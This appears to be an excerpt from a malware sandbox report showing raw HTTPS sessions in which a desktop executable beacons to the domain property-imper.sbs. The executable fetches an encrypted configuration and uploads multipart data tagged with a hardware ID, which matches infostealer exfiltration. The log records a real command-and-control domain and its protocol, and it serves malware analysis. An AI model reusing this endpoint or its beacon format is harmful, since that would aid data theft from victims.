                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.649707172.67.162.844434416C:\Users\user\Desktop\file.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-24 11:49:13 UTC265OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 8
                                                                                            Host: property-imper.sbs
                                                                                            2024-11-24 11:49:13 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                            Data Ascii: act=life
                                                                                            2024-11-24 11:49:13 UTC1021INHTTP/1.1 200 OK
                                                                                            Date: Sun, 24 Nov 2024 11:49:13 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=aq4vvvhg0flhjmsl1p5domlep3; expires=Thu, 20-Mar-2025 05:35:52 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H%2BnsBf6kspcnr%2Fsgb6JTwiOEm1qBDnMdcg0%2B1024Jvh%2FYp7Hkg1g2MIOI1N%2Fr5IDzI4mrkYie6QY1BX%2FI5mEhw2pJzYiEf3URmk7pX65w%2BbAR8hWJjnWM3n1JzXA0qPqcx7Mffs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e792ca5cfdf3314-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1756&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1573275&cwnd=224&unsent_bytes=0&cid=be0c952a4984fa69&ts=718&x=0"
                                                                                            2024-11-24 11:49:13 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                            Data Ascii: 2ok
                                                                                            2024-11-24 11:49:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.649709172.67.162.844434416C:\Users\user\Desktop\file.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-24 11:49:14 UTC266OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 53
                                                                                            Host: property-imper.sbs
                                                                                            2024-11-24 11:49:14 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                            2024-11-24 11:49:15 UTC1011INHTTP/1.1 200 OK
                                                                                            Date: Sun, 24 Nov 2024 11:49:15 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=1bfpfo5i51079lilem7nssu660; expires=Thu, 20-Mar-2025 05:35:54 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QaTsy7MXm8jYjT%2BOHXhJXW4AWmqXIsWEAAgGdmlTkd35XDL5SNGlo5wOkElX2HuiinZJy0JlRBrg7AtAWQVoljqmgRsvk5ieVAX5jvV2PRN58f5cuKkwtsX7A9HuY0HoOdY%2F7fk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e792cb24f3b7291-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1793&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=955&delivery_rate=1600000&cwnd=218&unsent_bytes=0&cid=68f913bdaa78b20a&ts=734&x=0"
                                                                                            2024-11-24 11:49:15 UTC358INData Raw: 34 64 64 0d 0a 5a 67 38 62 74 4a 6e 44 75 6a 57 68 6c 2b 33 4d 77 31 4d 65 35 64 64 57 71 75 5a 44 77 56 78 75 36 44 59 55 61 65 34 48 4d 74 67 64 4c 57 32 57 6f 2f 65 57 46 39 4c 79 7a 2f 61 33 49 57 75 41 2b 33 54 4c 67 6d 48 37 4f 67 2b 45 52 58 46 46 7a 48 46 66 2b 6c 78 70 65 74 6a 71 70 70 59 58 78 4f 2f 50 39 70 67 6f 50 49 43 35 64 4a 44 45 4a 71 73 2b 44 34 52 55 64 51 4b 42 64 31 36 37 44 6d 4e 38 33 50 79 67 33 6c 54 4e 2b 6f 69 70 70 6a 4a 30 69 37 34 37 77 6f 74 68 37 58 34 4c 6b 68 51 75 53 36 4e 69 52 72 6b 72 62 6d 6a 66 75 37 36 57 54 6f 50 79 67 2b 37 35 63 58 2b 41 74 54 72 4d 67 69 69 70 4e 41 61 4d 56 58 41 44 6e 6d 35 55 73 41 35 74 66 39 33 32 71 63 70 5a 78 2f 32 44 72 36 77 79 50 4d 6e 31 4d 39 44 45 65 65 4e 74 50 6f 6c 46 5a 78
                                                                                            Data Ascii: 4ddZg8btJnDujWhl+3Mw1Me5ddWquZDwVxu6DYUae4HMtgdLW2Wo/eWF9Lyz/a3IWuA+3TLgmH7Og+ERXFFzHFf+lxpetjqppYXxO/P9pgoPIC5dJDEJqs+D4RUdQKBd167DmN83Pyg3lTN+oippjJ0i747woth7X4LkhQuS6NiRrkrbmjfu76WToPyg+75cX+AtTrMgiipNAaMVXADnm5UsA5tf932qcpZx/2Dr6wyPMn1M9DEeeNtPolFZx
                                                                                            2024-11-24 11:49:15 UTC894INData Raw: 2f 36 45 71 37 4d 36 64 59 71 34 4e 4d 57 4f 4c 71 41 2b 43 34 42 65 65 51 47 49 61 46 32 38 42 47 30 35 6d 4c 75 6d 77 42 65 62 74 61 79 72 73 54 5a 77 6b 66 63 4f 69 4a 74 76 75 6e 34 4c 68 68 51 75 53 34 52 67 55 37 6b 50 59 6e 72 65 38 4c 50 59 52 63 58 34 69 72 79 6e 4e 48 4b 4e 74 69 62 43 69 69 65 67 4e 77 65 44 55 58 45 50 7a 43 73 51 76 52 77 74 49 5a 62 61 72 4e 4e 62 79 65 4b 50 37 72 35 2f 5a 63 65 79 4f 49 6a 63 59 61 63 2f 43 49 74 51 65 41 57 49 61 56 61 30 43 57 4a 2f 33 50 75 6d 30 6c 2f 4c 39 49 4b 6c 72 6a 46 35 69 72 45 79 78 49 55 6b 34 33 42 4d 6a 55 77 32 55 38 78 4c 56 37 6b 57 4c 30 7a 56 39 61 2f 66 51 59 50 71 77 62 66 68 4e 6e 44 48 37 58 54 47 67 53 36 78 50 78 36 50 57 6d 51 48 69 57 4e 64 75 51 70 74 66 4e 48 32 72 39 35 51
                                                                                            Data Ascii: /6Eq7M6dYq4NMWOLqA+C4BeeQGIaF28BG05mLumwBebtayrsTZwkfcOiJtvun4LhhQuS4RgU7kPYnre8LPYRcX4irynNHKNtibCiiegNweDUXEPzCsQvRwtIZbarNNbyeKP7r5/ZceyOIjcYac/CItQeAWIaVa0CWJ/3Pum0l/L9IKlrjF5irEyxIUk43BMjUw2U8xLV7kWL0zV9a/fQYPqwbfhNnDH7XTGgS6xPx6PWmQHiWNduQptfNH2r95Q
                                                                                            2024-11-24 11:49:15 UTC1369INData Raw: 33 66 38 66 0d 0a 4e 64 65 79 76 79 64 70 4b 30 2f 62 6f 71 2f 4d 63 61 49 4a 4b 77 2b 44 59 74 61 66 41 44 4d 4b 78 43 39 48 43 30 68 6c 74 53 73 79 45 58 4a 2f 70 37 73 6c 44 4a 79 69 62 49 69 69 4a 74 76 75 6e 34 4c 68 68 51 75 53 34 64 6a 58 4c 59 45 61 32 76 59 39 4c 50 53 52 63 66 37 69 36 4b 76 4f 48 47 49 73 43 62 4d 68 44 4f 69 4f 77 75 45 57 57 51 4f 7a 43 73 51 76 52 77 74 49 5a 62 42 6c 64 39 48 30 76 4c 4e 6d 36 49 2f 63 6f 43 6a 64 4e 66 4b 4f 4f 4d 35 41 4d 6f 4d 4e 67 69 41 61 46 6d 2f 43 33 39 7a 32 76 71 7a 33 31 37 4b 2f 34 36 67 72 6a 70 77 67 71 63 2f 78 34 77 75 6f 6a 4d 42 67 56 42 32 53 38 49 6c 56 36 4a 45 4e 54 6e 33 39 71 37 4b 56 4e 4b 33 75 71 32 76 50 33 75 52 39 53 75 47 6e 57 47 6b 4d 6b 7a 53 46 48 63 48 67 47 52 66 76 41
                                                                                            Data Ascii: 3f8fNdeyvydpK0/boq/McaIJKw+DYtafADMKxC9HC0hltSsyEXJ/p7slDJyibIiiJtvun4LhhQuS4djXLYEa2vY9LPSRcf7i6KvOHGIsCbMhDOiOwuEWWQOzCsQvRwtIZbBld9H0vLNm6I/coCjdNfKOOM5AMoMNgiAaFm/C39z2vqz317K/46grjpwgqc/x4wuojMBgVB2S8IlV6JENTn39q7KVNK3uq2vP3uR9SuGnWGkMkzSFHcHgGRfvA
                                                                                            2024-11-24 11:49:15 UTC1369INData Raw: 38 4b 58 63 56 38 37 2b 67 61 43 6f 50 58 53 4c 73 69 62 46 67 53 6d 70 4e 77 6d 47 57 58 55 5a 6a 32 51 51 39 45 52 71 59 5a 61 6a 34 66 39 6b 39 4e 62 50 73 65 38 6f 50 49 43 35 64 4a 44 45 49 4b 73 35 41 6f 35 47 65 42 6d 43 59 6c 43 38 44 47 56 2b 32 76 57 76 79 6c 2f 43 39 59 47 68 71 54 68 34 68 72 45 77 78 49 4e 68 37 58 34 4c 6b 68 51 75 53 36 52 6d 53 71 42 47 51 33 4c 57 2f 4c 48 4f 54 49 50 71 77 62 66 68 4e 6e 44 48 37 58 54 4d 6a 79 75 71 50 51 57 4f 57 58 59 43 67 32 78 59 74 77 78 2f 65 4e 7a 70 70 64 31 57 7a 50 2b 4c 70 71 30 2b 63 49 4f 6e 50 34 6a 4b 59 61 51 6d 54 4e 49 55 56 67 43 61 52 6b 4b 6f 52 48 49 33 7a 37 75 6d 31 42 65 62 74 59 61 69 6f 44 42 32 67 62 34 78 78 59 51 6b 71 54 6b 41 69 6c 52 31 44 59 70 6f 57 4c 49 49 59 58 72
                                                                                            Data Ascii: 8KXcV87+gaCoPXSLsibFgSmpNwmGWXUZj2QQ9ERqYZaj4f9k9NbPse8oPIC5dJDEIKs5Ao5GeBmCYlC8DGV+2vWvyl/C9YGhqTh4hrEwxINh7X4LkhQuS6RmSqBGQ3LW/LHOTIPqwbfhNnDH7XTMjyuqPQWOWXYCg2xYtwx/eNzppd1WzP+Lpq0+cIOnP4jKYaQmTNIUVgCaRkKoRHI3z7um1BebtYaioDB2gb4xxYQkqTkAilR1DYpoWLIIYXr
                                                                                            2024-11-24 11:49:15 UTC1369INData Raw: 46 7a 46 2b 34 36 6f 72 54 77 38 79 66 55 7a 30 4d 52 35 34 78 6b 57 68 31 4a 68 47 72 6c 69 55 4f 74 45 63 6a 66 50 75 36 62 55 46 35 75 31 67 71 4b 72 50 48 6d 44 76 54 50 4c 68 53 32 6e 4d 77 47 4f 58 58 49 4f 6e 6e 64 57 74 41 52 69 64 39 6e 33 73 39 5a 53 77 2f 6e 50 34 4f 45 32 5a 4d 66 74 64 50 6d 54 49 65 4d 68 51 70 4d 55 63 51 66 4d 50 52 43 31 43 58 39 31 32 66 75 67 32 31 50 49 38 6f 6d 6f 6f 44 4a 35 68 4c 41 79 79 59 51 74 71 54 6b 45 67 46 70 37 44 59 68 6a 56 76 70 4b 4c 58 37 4f 75 2f 6d 59 5a 63 37 37 68 71 32 6e 50 47 71 76 68 48 54 58 79 6a 6a 6a 4f 51 44 4b 44 44 59 50 68 32 31 63 76 77 78 6f 65 4e 37 78 71 64 64 59 30 66 53 41 70 36 59 36 63 59 69 37 4d 63 61 57 4a 71 67 31 42 49 4e 61 63 45 76 43 4a 56 65 69 52 44 55 35 34 50 69 76
                                                                                            Data Ascii: FzF+46orTw8yfUz0MR54xkWh1JhGrliUOtEcjfPu6bUF5u1gqKrPHmDvTPLhS2nMwGOXXIOnndWtARid9n3s9ZSw/nP4OE2ZMftdPmTIeMhQpMUcQfMPRC1CX912fug21PI8omooDJ5hLAyyYQtqTkEgFp7DYhjVvpKLX7Ou/mYZc77hq2nPGqvhHTXyjjjOQDKDDYPh21cvwxoeN7xqddY0fSAp6Y6cYi7McaWJqg1BINacEvCJVeiRDU54Piv
                                                                                            2024-11-24 11:49:15 UTC1369INData Raw: 47 42 76 4b 41 2b 50 4d 6e 31 4d 39 44 45 65 65 4d 50 47 6f 31 54 65 55 6d 6c 59 6b 75 37 44 6d 35 79 32 72 75 2b 6c 6b 36 44 38 6f 50 75 2b 58 46 78 69 37 67 77 32 6f 67 68 6f 7a 63 4c 67 45 5a 35 42 49 46 6d 55 4c 38 57 62 47 76 5a 38 4b 54 62 55 38 7a 36 67 36 61 72 63 54 4c 48 73 69 79 49 33 47 47 50 50 52 32 41 46 6c 45 52 6d 6d 4a 63 71 77 39 67 64 5a 62 6b 37 38 45 58 78 50 6e 50 39 75 45 78 66 59 71 6e 4d 63 6d 4f 4b 36 34 32 41 34 39 52 65 51 2b 49 62 6c 36 6f 43 6d 4a 35 30 50 43 67 33 56 54 49 2f 34 47 6e 73 33 45 79 78 37 49 73 69 4e 78 68 69 53 55 4e 68 31 67 30 4a 59 64 7a 56 2f 67 6c 59 33 4c 52 39 37 65 59 53 49 33 73 7a 36 6d 74 63 53 54 48 76 44 72 45 68 79 61 72 4e 67 6d 4b 58 33 59 45 68 6d 74 58 71 41 35 68 63 38 54 30 6f 74 56 54 7a
                                                                                            Data Ascii: GBvKA+PMn1M9DEeeMPGo1TeUmlYku7Dm5y2ru+lk6D8oPu+XFxi7gw2oghozcLgEZ5BIFmUL8WbGvZ8KTbU8z6g6arcTLHsiyI3GGPPR2AFlERmmJcqw9gdZbk78EXxPnP9uExfYqnMcmOK642A49ReQ+Ibl6oCmJ50PCg3VTI/4Gns3Eyx7IsiNxhiSUNh1g0JYdzV/glY3LR97eYSI3sz6mtcSTHvDrEhyarNgmKX3YEhmtXqA5hc8T0otVTz
                                                                                            2024-11-24 11:49:15 UTC1369INData Raw: 68 4e 6e 44 48 37 58 54 49 67 43 32 67 4f 51 4b 46 57 58 6b 4d 68 32 70 61 74 42 5a 69 66 4e 37 33 71 64 56 46 79 66 2b 64 70 36 67 38 63 6f 2b 6e 4e 34 6a 4b 59 61 51 6d 54 4e 49 55 52 41 47 50 61 55 61 33 43 79 31 6d 6d 4f 4c 68 33 31 75 44 72 63 2b 38 73 7a 46 33 68 37 49 36 32 6f 55 70 72 44 51 4d 6a 46 39 38 43 49 56 68 58 72 4d 43 62 48 54 58 2b 71 48 64 56 38 72 6e 67 75 37 76 63 58 75 66 39 57 79 49 73 79 32 6f 44 77 2b 63 46 47 6c 46 6c 53 56 58 74 6b 51 31 4f 64 66 70 72 4e 42 54 77 2f 69 4a 70 61 41 77 66 34 65 31 4e 38 69 42 4b 71 77 34 43 34 64 65 66 77 4b 65 62 56 53 6f 42 47 46 39 6c 72 58 68 33 30 2b 44 72 63 2b 65 6f 6a 70 77 68 37 67 68 69 4a 74 76 75 6e 34 4c 68 68 51 75 53 34 52 75 57 37 77 50 62 6e 72 59 38 4b 76 58 57 4d 6e 7a 69 61
                                                                                            Data Ascii: hNnDH7XTIgC2gOQKFWXkMh2patBZifN73qdVFyf+dp6g8co+nN4jKYaQmTNIURAGPaUa3Cy1mmOLh31uDrc+8szF3h7I62oUprDQMjF98CIVhXrMCbHTX+qHdV8rngu7vcXuf9WyIsy2oDw+cFGlFlSVXtkQ1OdfprNBTw/iJpaAwf4e1N8iBKqw4C4defwKebVSoBGF9lrXh30+Drc+eojpwh7ghiJtvun4LhhQuS4RuW7wPbnrY8KvXWMnzia
                                                                                            2024-11-24 11:49:15 UTC1369INData Raw: 6a 4c 6c 32 79 59 6b 78 70 48 35 43 79 6c 49 32 55 39 77 72 45 4c 34 56 4c 53 47 47 71 66 71 4e 42 4a 53 6c 33 62 48 76 4b 44 79 52 39 57 79 61 79 6d 47 78 66 6c 54 4b 45 33 55 5a 6e 6d 4e 54 72 41 63 71 52 2b 6a 62 71 74 52 55 7a 2f 53 49 37 75 39 78 63 38 66 74 44 59 69 48 4d 37 46 78 48 5a 78 5a 5a 67 7a 41 62 55 47 33 43 43 30 33 6c 72 65 6c 30 31 76 47 38 70 2f 68 73 79 46 33 69 36 4e 34 7a 4a 5a 68 37 58 34 64 67 56 74 6b 42 59 73 71 51 61 77 4a 66 58 72 54 2f 4f 33 51 52 73 37 35 7a 2b 44 68 4a 48 65 4c 73 7a 6e 64 79 7a 43 31 50 52 71 4e 47 48 34 61 67 57 6b 51 68 55 6f 74 59 5a 61 6a 34 65 31 55 7a 66 75 49 75 4c 42 38 58 49 79 35 4e 38 53 46 4a 75 4e 77 54 49 77 55 4c 6c 6a 43 4a 56 53 72 52 44 55 70 68 4b 44 30 69 77 43 54 70 35 44 67 75 48 46
                                                                                            Data Ascii: jLl2yYkxpH5CylI2U9wrEL4VLSGGqfqNBJSl3bHvKDyR9WyaymGxflTKE3UZnmNTrAcqR+jbqtRUz/SI7u9xc8ftDYiHM7FxHZxZZgzAbUG3CC03lrel01vG8p/hsyF3i6N4zJZh7X4dgVtkBYsqQawJfXrT/O3QRs75z+DhJHeLszndyzC1PRqNGH4agWkQhUotYZaj4e1UzfuIuLB8XIy5N8SFJuNwTIwULljCJVSrRDUphKD0iwCTp5DguHF
                                                                                            2024-11-24 11:49:15 UTC1369INData Raw: 4a 76 4b 59 62 46 2b 56 4d 6f 54 65 41 61 4e 5a 6c 36 35 46 6e 39 2f 31 65 32 69 6e 32 6e 39 30 49 4b 6a 70 44 39 37 75 59 73 56 77 70 51 73 72 44 6b 79 74 47 4e 6e 44 4a 77 6e 64 72 6b 53 62 6a 6d 59 75 37 6d 59 44 34 50 55 68 62 36 73 50 6e 76 48 2b 33 54 4d 78 48 6e 6a 47 77 47 48 55 58 67 4d 7a 6b 52 61 71 67 6c 69 66 70 61 31 34 64 51 58 6d 37 57 4f 70 4c 45 38 63 34 44 35 4d 39 4b 44 59 65 31 2b 41 73 6f 4d 4e 67 71 47 64 56 32 31 41 79 46 2f 32 50 58 68 78 78 6e 61 74 5a 6e 75 2b 57 49 79 78 36 64 30 6b 4d 52 6d 72 54 4d 4e 69 56 70 31 47 5a 35 6a 55 36 77 48 4b 6b 66 6f 33 71 7a 56 55 73 33 79 73 5a 43 41 4f 32 79 4b 75 6a 4f 4b 70 43 61 31 50 54 4b 30 59 32 63 4d 6e 43 64 32 75 52 4a 75 4f 5a 69 37 75 5a 67 50 67 39 53 46 76 71 77 2b 65 38 57 56
                                                                                            Data Ascii: JvKYbF+VMoTeAaNZl65Fn9/1e2in2n90IKjpD97uYsVwpQsrDkytGNnDJwndrkSbjmYu7mYD4PUhb6sPnvH+3TMxHnjGwGHUXgMzkRaqglifpa14dQXm7WOpLE8c4D5M9KDYe1+AsoMNgqGdV21AyF/2PXhxxnatZnu+WIyx6d0kMRmrTMNiVp1GZ5jU6wHKkfo3qzVUs3ysZCAO2yKujOKpCa1PTK0Y2cMnCd2uRJuOZi7uZgPg9SFvqw+e8WV


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.649710172.67.162.844434416C:\Users\user\Desktop\file.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-24 11:49:17 UTC285OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=YV731YY2NA1JES64O6H
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 12871
                                                                                            Host: property-imper.sbs
                                                                                            2024-11-24 11:49:17 UTC12871OUTData Raw: 2d 2d 59 56 37 33 31 59 59 32 4e 41 31 4a 45 53 36 34 4f 36 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 46 32 45 38 36 37 39 46 37 30 37 36 38 46 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 59 56 37 33 31 59 59 32 4e 41 31 4a 45 53 36 34 4f 36 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 56 37 33 31 59 59 32 4e 41 31 4a 45 53 36 34 4f 36 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                            Data Ascii: --YV731YY2NA1JES64O6HContent-Disposition: form-data; name="hwid"6AF2E8679F70768FD7CBBD6DF28D3732--YV731YY2NA1JES64O6HContent-Disposition: form-data; name="pid"2--YV731YY2NA1JES64O6HContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                            2024-11-24 11:49:18 UTC1014INHTTP/1.1 200 OK
                                                                                            Date: Sun, 24 Nov 2024 11:49:17 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=ocv77er505n2r2h9seo8osgdr1; expires=Thu, 20-Mar-2025 05:35:56 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hJ1nmkys9sw8LMNFEekY5CAfNq6iW4irUrou2h0Gu0cflU%2F7xe7nxeMqWJHvBaV%2FAMjFSgOSo2Vz9dQKJ2mXhSKXuetMwL8WPPB9ouWxHkyUYYN10dZFGpzTsGnNcp7vp8r7itA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e792cbfdd050f79-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1492&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13814&delivery_rate=1898569&cwnd=241&unsent_bytes=0&cid=c13e9a95e7cddebe&ts=905&x=0"
                                                                                            2024-11-24 11:49:18 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                            Data Ascii: eok 8.46.123.75
                                                                                            2024-11-24 11:49:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.649712172.67.162.844434416C:\Users\user\Desktop\file.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-24 11:49:19 UTC276OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=MYQD248BVF
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 15063
                                                                                            Host: property-imper.sbs
                                                                                            2024-11-24 11:49:19 UTC15063OUTData Raw: 2d 2d 4d 59 51 44 32 34 38 42 56 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 46 32 45 38 36 37 39 46 37 30 37 36 38 46 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4d 59 51 44 32 34 38 42 56 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 59 51 44 32 34 38 42 56 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4d 59 51 44 32 34 38 42 56 46 0d 0a 43 6f
                                                                                            Data Ascii: --MYQD248BVFContent-Disposition: form-data; name="hwid"6AF2E8679F70768FD7CBBD6DF28D3732--MYQD248BVFContent-Disposition: form-data; name="pid"2--MYQD248BVFContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--MYQD248BVFCo
                                                                                            2024-11-24 11:49:20 UTC1023INHTTP/1.1 200 OK
                                                                                            Date: Sun, 24 Nov 2024 11:49:20 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=gjfqfh60limha8gskf3i1b0vhh; expires=Thu, 20-Mar-2025 05:35:58 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1UfNjIVfSZZ%2BD%2FIexxO4%2B9yQq8HW%2BKavP83CZrzdpdIUwA3EfLGTpZnEVtSm5Vh4xtmfIKmkXfOIdbgaImae%2Fjtk0RTlY%2BF0yFfTnJymWYbiUkb7498A4iTfUNBPxf11tXyOuUg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e792ccdc8234380-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1730&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2844&recv_bytes=15997&delivery_rate=1623123&cwnd=212&unsent_bytes=0&cid=ca9d64bf2eda4a9f&ts=892&x=0"
                                                                                            2024-11-24 11:49:20 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                            Data Ascii: eok 8.46.123.75
                                                                                            2024-11-24 11:49:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.649718172.67.162.844434416C:\Users\user\Desktop\file.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-24 11:49:21 UTC285OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=RSTFWNBM120QDP41NWI
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 19975
                                                                                            Host: property-imper.sbs
